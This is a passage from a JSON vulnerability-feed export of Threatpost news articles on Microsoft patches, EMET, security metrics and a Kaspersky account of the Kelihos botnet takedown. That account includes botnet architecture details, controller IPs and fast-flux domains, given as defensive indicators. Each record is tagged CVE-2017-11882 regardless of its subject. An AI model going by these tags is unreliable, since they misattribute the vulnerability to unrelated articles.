["CVE-2017-11882"], "modified": "2018-08-15T10:19:32", "id": "THREATPOST:334259E5C4B157E6AC8ADC754BD30D4F", "href": "https://threatpost.com/how-to-minimize-your-database-attack-surface/74583/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "Microsoft will use its monthly patch to fix a critical security hole in versions of its Microsoft Office suit that could allow attackers to run malicious code on vulnerable systems. \n\nThe company [announced details of its upcoming monthly patch for November on Thursday](<http://www.microsoft.com/technet/security/bulletin/ms10-nov.mspx>). This months patch also included bulletins regarding upcoming fixes for two other security vulnerabilities: another in the Microsoft Office suite that was rated \u201cimportant,\u201d and a third in the Forefront Unified Access Gateway that was also rated \u201cimportant.\u201d \n\nThe relatively meager group of three bulletins is a welcome change for IT administrators still trying to dig out from[ October\u2019s monthly patch](<https://threatpost.com/microsoft-plans-record-breaking-patch-tuesday-100710/>), which comprised 16 bulletins and fixes for 49 separate vulnerabilities. \n\nThe most serious vulnerability is rated \u201ccritical\u201d for Microsoft Office 2007, Service Pack 2 and for 32 and 64 bit editions of Office 2010. It is rated \u201cimportant\u201d for Office 2003, Service Pack 3, Office XP, Service Pack 3 and Office for Mac 2011. \n\nAccording to Microsoft\u2019s Bulletin [Severity Rating System](<http://www.microsoft.com/technet/security/bulletin/rating.mspx>), \u201ccritical\u201d vulnerabilities are described as those whose exploitation could allow the propagation of an Internet worm without user interaction, while \u201cimportant\u201d holes are those in which exploitation could result in the compromise of the confidentiality, integrity or availability of users\u2019 data or processing resources. \n\nA second Office vulnerability is rated \u201cimportant\u201d and effects PowerPoint 2002 Service Pack 3 and PowerPoint 2003 Service Pack 3. \n\nThe third bulletin affects Microsoft\u2019s Forefront Unified Access Gateway 2010 Updates 1 and 2 and is rated important. \n\nMicrosoft will release its monthly patch update on Tuesday November 9, 2010. \n", "cvss3": {}, "published": "2010-11-04T21:58:02", "type": "threatpost", "title": "Microsoft To Patch Critical Office Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:44", "id": "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "href": "https://threatpost.com/microsoft-patch-critical-office-flaw-110410/74642/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:04", "description": "[As expected](<http://threatpost.com/microsoft-to-fix-word-zero-day-with-final-xp-patch/105241>), Microsoft issued its final epitaph for Windows XP today, pushing out four security bulletins for 11 vulnerabilities, including the last updates for the oft-maligned, thirteen-year-old operating system.\n\nDespite it being XP\u2019s last gasp from a security standpoint, it\u2019s actually a relatively light batch of [Patch Tuesday updates](<http://technet.microsoft.com/en-us/security/bulletin/ms14-apr>) this month. Two of the bulletins are branded critical and the other two important, but all of them can lead to remote code execution in their respective software, including recent versions of Word and some versions of Internet Explorer, if left unpatched.\n\nThe first critical patch (MS14-017) fixes a zero day first discovered last month in Microsoft Word. The patch fixes three vulnerabilities in total, chief among them the RTF memory corruption vulnerability that\u2019s been [discussed in depth](<http://threatpost.com/word-zero-day-attacks-use-complex-chain-of-exploits/105002>) over the past month. That bug could open the program up to remote code execution and let an attacker gain administrative rights if a specially crafted RTF file is either opened or previewed in Word or Outlook. [Microsoft first warned about the vulnerability](<http://threatpost.com/targeted-attacks-exploit-microsoft-word-zero-day/104980>) \u2013 first in an advisory last month, then in a Fix-It \u2013 after it discovered limited targeted attacks that used it for a vector in the wild. The exploit for the zero day, rather complex in nature, includes ASLR bypass, ROP techniques and shellcode with multiple mechanisms designed to circumvent analysis. In addition to the memory corruption bug, the patch also fixes two additional vulnerabilities; a file format converter vulnerability in Office and a stack overflow vulnerability in Word.\n\nThe Word issue is the only bug being patched today that\u2019s actively being exploited, so naturally experts are calling it the biggest priority of the four for service administrators.\n\n\u201cThis continues a trend we\u2019ve seen of Office-based exploits being successfully used in targeted attacks over the past few years,\u201d Marc Maiffret, the CTO of BeyondTrust said Tuesday. \u201cDeploy this patch as soon as possible to fix vulnerabilities in both Word and Office Web apps.\u201d\n\nThe second critical patch (MS14-018) also fixes a memory corruption bug, six of them to be exact, in most versions (6-9, 11) of Internet Explorer. Much like the Word vulnerability if a user were to stumble upon a malicious webpage an attacker could exploit the bug to execute code on the computer in the context of its current user. This vulnerability is one of two that affect components on XP, including IE 6 for those still running XP\u2019s Service Pack 3 and its Professional x64 Edition Service Pack 2.\n\nA previously disclosed file handling vulnerability (MS14-019) was also fixed by today\u2019s updates that could have allowed remote code execution in Windows. If left unpatched an attacker could trick a user to run a specially crafted .bat or .cmd file and gain command. While still important it\u2019s safe to say this vulnerability may be the least dangerous of today\u2019s patches as a user would have to be tempted to execute a batch file on a malicious network share. Still, this is the second issue that could affect users running some outdated versions of XP.\n\nThe last patch (MS14-020) addresses a hole that could open a machine up to remote code execution if someone were to open a specially crafted Microsoft Publisher file.\n\nWhile it may seem minor, Ross Barrett, Senior Manager of Security Engineering at Rapid7, is encouraging any firms that use the software on their system to prioritize the patch.\n\n\u201cI expect anyone who still works with it might actually be gullible enough to click on email attachments of Publisher documents,\u201d Barrett said of the vulnerability on Tuesday.\n\nOn top of the two bulletins that affect XP, both the Publisher issue and the Word issue figure into two bulletins that also affect Microsoft Word 2003, the final four updates for both XP and Office 2003.\n\nIf somehow you missed it, [Microsoft is ending support for XP](<http://threatpost.com/microsoft-xp-end-of-life-an-important-security-milestone/102789>), Internet Explorer 6 and Office 2003 today, meaning this month\u2019s patches mark the last time the company will issue security updates for these products. While it\u2019s only a scant four bulletins, this makes April\u2019s Patch Tuesday an essential one for those who rely on the outdated platforms and apps.\n\nIt\u2019s assumed many admins are in the process of migrating off of XP \u2013 but it\u2019s likely they\u2019ll continue to have their hands full, not just with today\u2019s updates, but also recent updates from [Google](<http://threatpost.com/google-patches-four-pwn2own-bugs-in-chrome-33/104828>), [Mozilla](<http://threatpost.com/mozilla-patches-pwn2own-zero-days-in-firefox-28/104889>), [Apple](<http://threatpost.com/apple-fixes-more-than-25-flaws-in-safari/105197>) and other companies following last month\u2019s Pwn2Own competition.\n\n[It\u2019s widely expected](<http://threatpost.com/windows-xp-end-of-life-breeding-equal-parts-fud-legit-concerns/105252>) that a subset of attackers will ramp up exploits targeting XP after today and potentially examine patches for modern Windows 7 and 8 systems and adapt them to now no-longer supported XP machines.\n", "cvss3": {}, "published": "2014-04-08T15:52:10", "type": "threatpost", "title": "April Patch Tuesday Fixes 11 Vulnerabilities, Last Updates for XP", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-11T18:53:10", "id": "THREATPOST:A2C4DFB7FD998E1990946FBDE70D8050", "href": "https://threatpost.com/last-call-for-xp-office-2003-updates-april-patch-tuesday-fixes-11-vulnerabilities/105329/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:20", "description": "Dennis Fisher t![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053752/adam_shostack_1.jpg)alks to Adam Shostack of Microsoft, about the evolution of thinking around \u201cThe New School of Information Security,\u201d his new group blog and what surprised him most when he went to work at Microsoft.\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_410.mp3>)\n\nSubscribe to the Digital Underground podcast on [**![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053753/itunes_button3119.jpg)**](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [Curious Hands](<http://podsafeaudio.com/jamroom/bands/1309/>).\n", "cvss3": {}, "published": "2009-04-07T13:43:08", "type": "threatpost", "title": "Adam Shostack on the Science of Security and Value of Thinking Differently", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:25:28", "id": "THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "href": "https://threatpost.com/adam-shostack-science-security-and-value-thinking-differently-040709/72705/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:29", "description": "One of the patches released by Microsoft last week is not providing protection against the vulnerability it was meant to fix, according to a researcher who today accused Microsoft of making functionality a higher priority than security.\n\nAccording to Tyler Reguly, a senior security engineer at nCircle Network Security Inc., last Tuesday\u2019s MS09-008 update does not fix the problem for all users, many of whom may not realize that they\u2019re still vulnerable to attack. \u201cWhen you get a patch from a vendor, you expect it to provide some level of security,\u201d said Reguly. \u201cBut MS09-008 only mitigates the problem, it doesn\u2019t patch it.\u201d\n\nRead [the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9129722&source=rss_topic17>) [computerworld.com]. \n\nAlso see [nCircle\u2019s original advisory](<http://blog.ncircle.com/blogs/vert/archives/2009/03/successful_exploit_renders_mic.html>) [ncircle.com] and the [reaction from Microsoft\u2019s security response](<http://blogs.technet.com/srd/archive/2009/03/13/ms09-008-dns-and-wins-server-security-update-in-more-detail.aspx>) [technet.com] team.\n", "cvss3": {}, "published": "2009-03-17T14:19:18", "type": "threatpost", "title": "Microsoft spars with researcher over security patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:34", "id": "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "href": "https://threatpost.com/microsoft-spars-researcher-over-security-patch-031709/72423/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:12", "description": "A [suspicious Windows 7 update](<https://answers.microsoft.com/en-us/windows/forum/windows_7-update/windows-7-update-appears-to-be-compromised/e96a0834-a9e9-4f03-a187-bef8ee62725e?auth=1>) today raised concern on a number of Microsoft and technology forums that the Windows Update service had been compromised. Microsoft, however, cleared the air several hours later admitting that the update was their mistake.\n\n\u201cWe incorrectly published a test update and are in the process of removing it,\u201d said a Microsoft spokesperson\n\nA compromise of such an automated update service would have had devastating results. Automated software update services have long been speculated as a means to spread malware at scale. Attackers or governments that infiltrate something like Windows Update could compromise software updates to the point where such services are no longer trusted, leaving endpoints and servers unpatched and at greater risk.\n\n[![accidental-windows-update](https://media.threatpost.com/wp-content/uploads/sites/103/2015/09/07002408/accidental-windows-update.jpeg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2015/09/07002408/accidental-windows-update.jpeg>)\n\nRated important, the mysterious update, purportedly a new language pack, showed up early this morning on home and business users\u2019 machines. The update was 4.3 MB in size and included long, random character file names and redirects to different .mil, .gov and .edu domains\u2014both of which were out of the norm for Windows updates.\n\nThe update has since disappeared from Windows Update, but not before it was pushed mostly to consumers via Windows Update. Some users said the update to install on their machines. Others who successfully installed the update essentially bricked their machines, according to replies on the original Windows 7 forum post.\n\nWindows Update and Windows Server Update Services (WSUS) are especially juicy targets. At Black Hat this summer, researchers Paul Stone and Alex Chapman of Context Information Security of the U.K. demonstrated [weaknesses in WSUS](<https://threatpost.com/manipulating-wsus-to-own-enterprises/114168/>) that are difficult to address and expose any server or desktop using its automated updates to compromise.\n\nJust last week, the _[Washington Post](<https://www.washingtonpost.com/world/national-security/obama-administration-ponders-how-to-seek-access-to-encrypted-data/2015/09/23/107a811c-5b22-11e5-b38e-06883aacba64_story.html>) _reported that the U.S. government explored several approaches that technology providers could implement to cure the [Going Dark crypto issue](<https://threatpost.com/feasible-going-dark-crypto-solution-nowhere-to-be-found/114150/>). Law enforcement and government officials have expressed concern over recent changes from Apple and Google, in particular, to divorce themselves from storing encryption keys. The practice, government says, hinders law enforcement and national security investigations. They suggest, according to the _Post _article, that under a court order, the government could drop spyware on machines via software update services.\n\nAt TrustyCon, a 2014 event adjunct to RSA Conference, ACLU principal technologist Chris Soghoian delivered a talk that also suggested the next wave of [surveillance efforts could target update services](<https://threatpost.com/are-automated-update-services-the-next-surveillance-frontier/104558/>).\n\nSoghoian said his concern is that the government will not only exploit the convenience of these update services offered by most large providers, but also that it will erode the trust users have in the services leaving them vulnerable to cybercrime, identity theft and fraud.\n\n\u201cThere are really sound security reasons why we want automatic security updates. If consumers have to do work to get updates, they won\u2019t, and they will stay vulnerable,\u201d Soghoian said in 2014. \u201cWhat that means though is giving companies root on our computers\u2014and we really don\u2019t know what\u2019s in the code after fact. This is a point of leverage the government can use. We have no evidence they are using it right now, but these companies have a position of power over our devices that is unparalleled.\u201d\n", "cvss3": {}, "published": "2015-09-30T15:22:01", "type": "threatpost", "title": "Mystery Windows 7 Update An Accidental Test Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-02T16:00:39", "id": "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "href": "https://threatpost.com/suspicious-windows-7-update-actually-an-accidental-microsoft-test-update/114860/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:14", "description": "If there\u2019s one key message coming through all of the noise at the RSA Conference this week it\u2019s the fact that there\u2019s a pressing need for more data. Data on attacks, data on vulnerabilities, data on data breaches, data on software security, data on everything having to do with security. The mini-movement that has sprung up around metrics and measurement in security has taken over a lot of the conversation at the conference, with some interesting results.\n\nSeveral different panels and talks have addressed the metrics problem from a variety of angles, with the consensus being that there just simply isn\u2019t enough good data available in most parts of the industry. The last few years have seen a marked increase in the amount of data avilable on some topics, especially data breaches, but those are still the exceptions rather than the rule. In a panel Wednesday morning, four experts with disparate backgrounds said that a big part of the problem is that it\u2019s not clear what should be measured or how.\n\nEven Microsoft, which has been looking at this problem for several years, doesn\u2019t have a clear answer. Adam Shostack, a security program manager at Microsoft, said the company has good systems in place for measuring vulnerability counts and patch counts, but is still working on how to get the most out of those numbers.\n\n\u201cThe one thing we know is that our customer would like fewer updates and more secure software,\u201d he said during the panel discussion, which also included Gary McGraw of Cigital, Matt Blaze of the University of Pennsylvania and Elizabeth Nichols of PlexLogic. \u201cThat\u2019s the primary metric that we work off of.\u201d\n\nMcGraw, who has been working on measuring software security and internal software security programs for several years, said that even the organizations doing the best job with those programs have a tough time getting the most out of their measurement efforts. But the key thing is, at least they\u2019re doing the measurements. The vast majority of software makers and other companies that produce their own custom applications aren\u2019t even taking that step.\n\n\u201cA lot of people are selling highly flammable software. There\u2019s no one who isn\u2019t because people don\u2019t know how to build secure software,\u201d Blaze said.\n", "cvss3": {}, "published": "2009-04-22T19:52:40", "type": "threatpost", "title": "Experts call for better measurement of security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:23", "id": "THREATPOST:21439BDD06D57894E0142A06D59463B5", "href": "https://threatpost.com/experts-call-better-measurement-security-042209/72562/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:09", "description": "Microsoft announced today that they will be shipping three critical and five important bulletins in the May edition of patch Tuesday.\n\nAll of the \u2018critical\u2019 bulletins and two of the \u2018important\u2019 bulletins fix vulnerabilities that could otherwise lead to remote code execution. The two remaining \u2018important\u2019 bulletins could lead to an elevation of privilege if unpatched.\n\nThe affected software includes, Microsoft Office, Windows, .NET Framework, and Silverlight. The bugs that will be fixed this month will affect all of the current versions of Windows.\n\nThe official bulletins will be released on [the TechNet Blog](<http://technet.microsoft.com/en-us/security/bulletin/ms12-may>) Tuesday, May 8, and Microsoft will host a webcast to discuss the fixes the following day, May, 9, at 11 AM PST.\n", "cvss3": {}, "published": "2012-05-03T18:28:56", "type": "threatpost", "title": "Patch Tuesday Advance Notification: May Edition", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:03:35", "id": "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "href": "https://threatpost.com/patch-tuesday-advance-notification-may-edition-050312/76522/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:05", "description": "[From eWEEK (Brian Prince)![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053737/windows_7.jpg)](<http://www.eweek.com/c/a/Security/Pirated-Windows-7-Builds-a-Botnet-With-Trojan-456054/>)\n\nAttackers pushing pirated, malware-laced copies of Microsoft\u2019s upcoming Windows 7 operating system have been actively trying to build a botnet.\n\nAccording to researchers at Damballa, attackers hid a Trojan inside of pirated copies of the operating system and began circulating them on BitTorrent sites. Damballa reported that it shut down the botnet\u2019s command and control server May 10, but by that time infection rates had risen as high as 552 users per hour. [Read the full story](<http://www.eweek.com/c/a/Security/Pirated-Windows-7-Builds-a-Botnet-With-Trojan-456054/>) [eweek.com]\n", "cvss3": {}, "published": "2009-05-12T22:23:28", "type": "threatpost", "title": "Pirated Windows 7 builds botnet with Trojan", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:12", "id": "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "href": "https://threatpost.com/pirated-windows-7-builds-botnet-trojan-051209/72691/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:19", "description": "SAN FRANCISCO \u2013 Enterprises beat up by wave after wave of Java exploits and calls to disable the platform may soon have some relief in sight.\n\nMicrosoft\u2019s free Enhanced Mitigation Experience Toolkit will soon have a new feature that allows users to configure where plug-ins, especially those targeted by hackers such as Java and Adobe Flash, are allowed to run by default. The feature is called Attack Surface Reduction, and it\u2019s one of two that Microsoft has made available in a [technical preview of EMET 5.0](<http://blogs.technet.com/b/srd/archive/2014/02/21/announcing-emet-5-0-technical-preview.aspx>) released today at RSA Conference 2014.\n\n\u201cASR is going to help a lot of people,\u201d said Microsoft software security engineer Jonathan Ness.\n\nBlocking Java outright, despite some of the dire attacks reported during the past 15 months, isn\u2019t an option for most companies that have built custom Java applications for critical processes such as payroll or human resources. With 5.0, users will have the option to run plug-ins in the Intranet zone while blocking them in the browser\u2019s Internet zone, or vice-versa.\n\n\u201cIt gives customers more control over how plug-ins are loaded into applications,\u201d said Ness, explaining users will have the flexibility, for example, to allow Flash to load in a browser, but block it in an Office application such as Word or Excel. A number of advanced attacks have contained malicious embedded Flash files inside benign Word documents or Excel spreadsheets. Microsoft hopes to use feedback received on the Technical Preview to shape the final 5.0 product.\n\n\u201cFeedback is really valuable, and has helped shape this tool,\u201d Ness said, adding that the release of EMET 4.1 was delayed right before launch to correct a shortcoming pointed out by a beta user. The customer was not pleased with EMET\u2019s automatic termination of applications upon detecting an exploit, rather than having a configuration option available where the event could be logged an analyzed later.\n\nMicrosoft has been vocal about recommending EMET as a temporary mitigation for zero-day attacks against previously unreported vulnerabilities. EMET includes a dozen mitigations that block exploit attempts targeting memory vulnerabilities. Most of the mitigations are for return-oriented programming exploits, in addition to memory-based mitigations ASLR, DEP, heap spray and SEHOP protections. EMET is not meant as a permanent fix, but only as a stopgap until a patch is ready for rollout.\n\nThe second new feature in the EMET 5.0 Technical Preview is a number of enhanced capabilities to Export Address Table Filtering, or EAF+. Ness said EAF+ blocks how shellcode calls are made into EA table filtering.\n\n\u201cWith OS functions such as open file or create process, exported code wants to jump into EAF. This filters the shellcode and blocks it if it\u2019s an exploit,\u201d Ness said. \u201cWe\u2019re extending that with new filtering (KERNELBASE exports and additional integrity checks on stack registers and limits).\u201d\n\nEMET raises development costs for exploit writers with its memory protections, so much so that the recent Operation SnowMan APT attack included a module that detected whether an EMET library was present and if so, the exploit would not execute itself. Researchers have developed bypasses of EMET\u2019s mitigations, first Aaron Portnoy of Exodus Intelligence last summer, and most recently, researchers at Bromium Labs who developed a complete EMET bypass.\n\nMicrosoft\u2019s Ness said improvements to EMET\u2019s Deep Hooks API protections have been rolled into the 5.0 Technical Preview that address the Bromium bypass. Whether it remains on by default in the final 5.0 remains to be seen as application compatibility issues have to be resolved first, Ness said.\n", "cvss3": {}, "published": "2014-02-25T16:37:11", "type": "threatpost", "title": "Microsoft EMET 5.0 Technical Preview Released", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-25T21:37:11", "id": "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "href": "https://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:45", "description": "Earlier this week, Microsoft released a**[![Tillmann Werner](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07064459/tillman_0.jpg)](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>)**n announcement about the disruption of a dangerous botnet that was responsible for spam messages, theft of sensitive financial information, pump-and-dump stock scams and distributed denial-of-service attacks.\n\nKaspersky Lab played a critical role in this botnet takedown initiative, leading the way to reverse-engineer the bot malware, crack the communication protocol and develop tools to attack the peer-to-peer infrastructure. We worked closely with Microsoft\u2019s Digital Crimes Unit (DCU), sharing the relevant information and providing them with access to our live botnet tracking system.\n\nA key part of this effort is the sinkholing of the botnet. It\u2019s important to understand that the botnet still exists \u2013 but it\u2019s being controlled by Kaspersky Lab. In tandem with Microsoft\u2019s move to the U.S. court system to disable the domains, we started to sinkhole the botnet. Right now we have 3,000 hosts connecting to our sinkhole every minute. This post describes the inner workings of the botnet and the work we did to prevent it from further operation.\n\nLet\u2019s start with some technical background: Kelihos is Microsoft\u2019s name for what Kaspersky calls Hlux. Hlux is a peer-to-peer botnet with an architecture similar to the one used for the Waledac botnet. It consists of layers of different kinds of nodes: controllers, routers and workers. Controllers are machines presumably operated by the gang behind the botnet. They distribute commands to the bots and supervise the peer-to-peer network\u2019s dynamic structure. Routers are infected machines with public IP addresses. They run the bot in router mode, host proxy services, participate in a fast-flux collective, and so on. Finally, workers are infected machines that do not run in router mode, simply put. They are used for sending out spam, collecting email addresses, sniffing user credentials from the network stream, etc. A sketch of the layered architecture is shown below with a top tier of four controllers and worker nodes displayed in green.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07064456/comeon.jpg)\n\n_Figure 1: Architecture of the Hlux botnet_\n\n**Worker Nodes**\n\nMany computers that can be infected with malware do not have a direct connection to the Internet. They are hidden behind gateways, proxies or devices that perform network address translation. Consequently, these machines cannot be accessed from the outside unless special technical measures are taken. This is a problem for bots that organize infected machines in peer-to-peer networks as that requires hosting services that other computers can connect to. On the other hand, these machines provide a lot of computing power and network bandwidth. A machine that runs the Hlux bot would check if it can be reached from the outside and if not, put itself in the worker mode of operation. Workers maintain a list of peers (other infected machines with public IP addresses) and request jobs from them. A job contains things like instructions to send out spam or to participate in denial-of-service attacks. It may also tell the bot to download an update and replace itself with the new version.\n\n**Router Nodes**\n\nRouters form some kind of backbone layer in the Hlux botnet. Each router maintains a peer list that contains information about other peers, just like worker nodes. At the same time, each router acts as an HTTP proxy that tunnels incoming connections to one of the Controllers. Routers may also execute jobs, but their main purpose is to provide the proxy layer in front of the controllers.\n\n**Controllers**\n\nThe controller nodes are the top visible layer of the botnet. Controllers host a nginx HTTP server and serve job messages. They do not take part in the peer-to-peer network and thus never show up in the peer lists. There are usually six of them, spread pairwise over different IP ranges in different countries. Each two IP addresses of a pair share an SSH RSA key, so it is likely that there is really only one box behind each address pair. From time to time some of the controllers are replaced with new ones. Right before the botnet was taken out, the list contained the following entries:\n\n193.105.134.189 \n193.105.134.190 \n195.88.191.55 \n195.88.191.57 \n89.46.251.158 \n89.46.251.160\n\n**The Peer-to-Peer Networks**\n\nEvery bot keeps up to 500 peer records in a local peer list. This list is stored in the Windows registry under HKEY_CURRENT_USERSoftwareGoogle together with other configuration details. When a bot starts on a freshly infected machine for the first time, it initializes its peer list with some hard-coded addresses contained in the executable. The latest bot version came with a total of 176 entries. The local peer list is updated with peer information received from other hosts. Whenever a bot connects to a router node, it sends up to 250 entries from its current peer list, and the remote peer send 250 of his entries back. By exchanging peer lists, the addresses of currently active router nodes are propagated throughout the botnet. A peer record stores the information shown in the following example:\n\nm_ip: 41.212.81.2 \nm_live_time: 22639 seconds \nm_last_active_time: 2011-09-08 11:24:26 GMT \nm_listening_port: 80 \nm_client_id: cbd47c00-f240-4c2b-9131-ceea5f4b7f67 \nThe peer-to-peer architecture implemented by Hlux has the advantage of being very resilient against takedown attempts. The dynamic structure allows for fast reactions if irregularities are observed. When a bot wants to request jobs, it never connects directly to a controller, no matter if it is running in worker or router mode. A job request is always sent through another router node. So, even if all controller nodes go off-line, the peer-to-peer layer remains alive and provides a means to announce and propagate a new set of controllers.\n\n**The Fast-Flux Service Network**\n\nThe Hlux botnet also serves several fast-flux domains that are announced in the domain name system with a TTL value of 0 in order to prevent caching. A query for one of the domains returns a single IP address that belongs to an infected machine. The fast-flux domains provide a fall-back channel that can be used by bots to regain access to the botnet if all peers in their local list are unreachable. Each bot version contains an individual hard-coded fall-back domain. Microsoft unregistered these domains and effectively decommissioned the fall-back channel. Here is the set of DNS names that were active before the takedown \u2013 in case you want to keep an eye on your DNS resolver. If you see machines asking for one of them, they are likely infected with Hlux and should be taken care of.\n\nhellohello123.com \nmagdali.com \nrestonal.com \neditial.com \ngratima.com \npartric.com \nwargalo.com \nwormetal.com \nbevvyky.com \nearplat.com \nmetapli.com\n\nThe botnet further used hundreds of sub-domains of ce.ms and cz.cc that can be registered without a fee. But these were only used to distribute updates and not as a backup link to the botnet.\n\n**Counteractions**\n\nA bot that can join the peer-to-peer network won\u2019t ever resolve any of the fall-back domains \u2013 it does not have to. In fact, our botnet monitor has not logged a single attempt to access the backup channel during the seven months it was operated as at least one other peer has always been reachable.\n\nThe communication for bootstrapping and receiving commands uses a special custom protocol that implements a structured message format, encryption, compression and serialization. The bot code includes a protocol dispatcher to route incoming messages (bootstrap messages, jobs, SOCKS communication) to the appropriate functions while serving everything on a single port. We reverse engineered this protocol and created some tools for decoding botnet traffic. Being able to track bootstrapping and job messages for a intentionally infected machine provided a view of what was happening with the botnet, when updates were distributed, what architectural changes were undertaken and also to some extend how many infected machines participate in the botnet.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053009/2_4.jpg)\n\n_Figure 2: Hits on the sinkhole per minute_\n\nThis Monday, we started to propagate a special peer address. Very soon, this address became the most prevalent one in the botnet, resulting in the bots talking to our machine, and to our machine only. Experts call such an action sinkholing \u2013 bots communicate with a sinkhole instead of its real controllers. At the same time, we distributed a specially crafted list of job servers to replace the original one with the addresses mentioned before and prevent the bots from requesting commands. From this point on, the botnet could not be commanded anymore. And since we have the bots communicating with our machine now, we can do some data mining and track infections per country, for example. So far, we have counted 49,007 different IP addresses. Kaspersky works with Internet service providers to inform the network owners about the infections.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07052559/3_21.jpg)\n\n_Figure 3: Sinkholed IP addresses per country_\n\n**What now?**\n\nThe main question is now: what is next? We obviously cannot sinkhole Hlux forever. The current measures are a temporary solution, but they do not ultimately solve the problem, because the only real solution would be a cleanup of the infected machines. We expect that the number of machines hitting our sinkhole will slowly lower over time as computers get cleaned and reinstalled. Microsoft said their Malware Protection Center has added the bot to their Malicious Software Removal Tool. Given the spread of their tool this should have an immediate impact on infection numbers. However, in the last 16 hours we have still observed 22,693 unique IP addresses. We hope that this number is going to be much lower soon.\n\nInterestingly, there is one other theoretical option to ultimately get rid of Hlux: we know how the bot\u2019s update process works. We could use this knowledge and issue our own update that removes the infections and terminates itself. However, this would be illegal in most countries and will thus remain theory.\n\n_Tillmann Werner is a senior malware analyst at Kaspersky Lab._\n", "cvss3": {}, "published": "2011-09-29T15:10:41", "type": "threatpost", "title": "The Inside Story of the Kelihos Botnet Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-01T20:51:46", "id": "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "href": "https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/75703/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:26", "description": "When one Pennsylvanian man couldn\u2019t foot his bills, he opted to steal the identity of someone that could \u2013 one of the world\u2019s richest men, Microsoft co-founder and billionaire Paul Allen.\n\nAn AWOL solider from Pittsburgh swiped Allen\u2019s Citibank credit card account information earlier this year to make a $658.81 payment on a loan from the Armed Forces Bank, according to an [Associated Press report](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n\nA criminal complaint unsealed Monday claims that after acquiring Allen\u2019s account information, the soldier, Brandon Lee Prince, 28, changed the address of the card to his own and reported it missing in an attempt to have a new card sent to his Pittsburgh address. The card was delivered and soon after, the fraudulent charges began to pile up.\n\nOn top of the loan payment, it was also used at a Pittsburgh GameStop ($278.18), a Family Dollar ($1) and at a Western Union, where Price 